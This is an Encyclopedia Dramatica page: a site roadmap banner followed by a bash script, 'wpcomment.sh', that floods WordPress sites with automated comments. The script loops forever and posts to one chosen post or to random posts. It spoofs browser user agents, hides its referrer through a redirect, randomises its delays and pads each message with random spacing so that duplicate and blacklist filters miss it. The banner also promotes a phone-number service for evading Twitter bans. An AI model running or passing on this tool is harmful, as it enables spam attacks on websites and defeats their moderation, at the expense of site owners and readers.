⚠️ Encyclopedia Dramatica is currently being restored by automated scripts ⚠️
There's been a lot of questions as to what's going on with the site and what comes next. So we have this (ordered) roadmap of what's being worked on and what's to come. This will be updated until the roadmap is complete as Æ has a lot of missing features and ideas that I'd like to fix in regards to its offerings before I implement big plans for the site's popularity and well-being in 2021.
Æ Roadmap
Content restoration (Mostly done, few things missing that will be restored sporadically)
Image restoration (Being run in background, nothing I can do cept wait)
Æ Imageboard (Currently being worked on)
Mediawiki upgrade and backend fixes
.onion domain for Tor-friendly editing and viewing
CSS overhaul (Fixing things like the videos on mobile, and overall a rehaul of the wiki's look to be more friendly to readers)
Paid bounty board for new articles (Won't be managed by me for legal reasons however I will ensure it runs smoothly)
Anonymous phone # service for those seeking ban evades from Twitter as well as a phone number not tied to their name (more details at launch)
Currently we are nearing our annual LLC renewal fee ($650) as well throwing the funds required for these other changes and aspects. If you would like to support Æ consider purchasing a copy of The Hustler's Bible or securing some Merch. Donating is also appreciated however I would rather give something back as per the two options above.
If you have any questions you can join our public Telegram chat to DM me privately or @ me in chat.
You can also email me via [email protected]
Merch notes: Thank you to all who have purchased merch. We will ship late January or mid February depending on our provider's speed.
Here's to setting the world on fire in 2021!
- aediot
Wpcomment.sh/code
Jump to navigation
Jump to search
#!/bin/bash # WordPress comment page enhancer # Usage: ./wpcomment.sh comment_file.txt author email website target/maximum post_ID user-agent http://anonym.to/http://full.path.to/wp-comments-post.php #Some user-agents: # Chrome: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.1 Safari/525.19 # Firefox: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 # Internet Explorer: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) # Opera: Opera/9.25 (Windows NT 6.0; U; en) #WORDPRESS COMMENT BLACKLISTING METHODS: # 'Hold a comment in the queue if it contains # or more links. (A common characteristic of comment spam is a large number of hyperlinks.)' # 'When a comment contains any of these [admin defined] words in its content, name, URL, e-mail, or IP, it will be (marked as spam/held in the moderation queue). # One word or IP per line. It will match inside words, so "press" will match "WordPress".' if [ -z "$1" ] then echo "Usage: comment_file.txt author email website target/maximum post_ID user-agent http://anonym.to/http://full.path.to/wp-comments-post.php" exit fi function postdelay { let "rsleep = (($RANDOM+1)%10)+20" back="" space="" for ((i=0; i < $rsleep; i++)) do sleep 1 echo -n "." back+="\b" space+=" " done echo -n -e "$back$space$back" } function randspace { rndspace="" for ((i = 0; i < 4; i++)) do let "num = $RANDOM % 256" rndspace+=$((echo "obase=2; $num"|bc)|sed 's/0/\%26nbsp%3B/g; s/1/ /g') done } #Read text file for comment, put %0d%0a for newlines while read line do #A & will screw with post data #Add more escaping if necessary comment+=$(echo "$line%0d%0a"|sed 's/\&/%26/g; s/\;/%3B/g') done < $1 #Target post ID if [ $5 == "target" ] then #One target post_id=$6 echo "Using post $6 as target" elif [ $5 == "maximum" ] then #Random target echo "Using random post IDs as targets" else echo "Set target or maximum for the fifth argument! (case sensitive) You set $5" exit fi #echo "Author: $2" #echo "Email: $3" #echo "Website: $4" #echo "Comment from: $1" #echo "Posting to $8" #Loop for posting while ((1)) do if [ $5 == "maximum" ] then let "post_id = ($RANDOM+1)%(($6))" fi #Generate new random content randspace #Post comment result=$(wget -q --ignore-length --wait=1 --random-wait --user-agent "$7" -O - --post-data "author=$2&email=$3&url=$4&comment=$comment%0d%0a$rndspace&submit=Submit+Comment&comment_post_ID=$post_id" "$8") #grep for error page (You are posting too quickly/Duplicate comment deleted) echeck=$(echo $result|grep '<body id="error-page">') if [ -z "$result" ] then #No response postdelay elif [ -z "$echeck" ] then #Response with no errors let "posts += 1" echo -n -e "\rPost #$posts" else #Response with error postdelay fi #End post loop done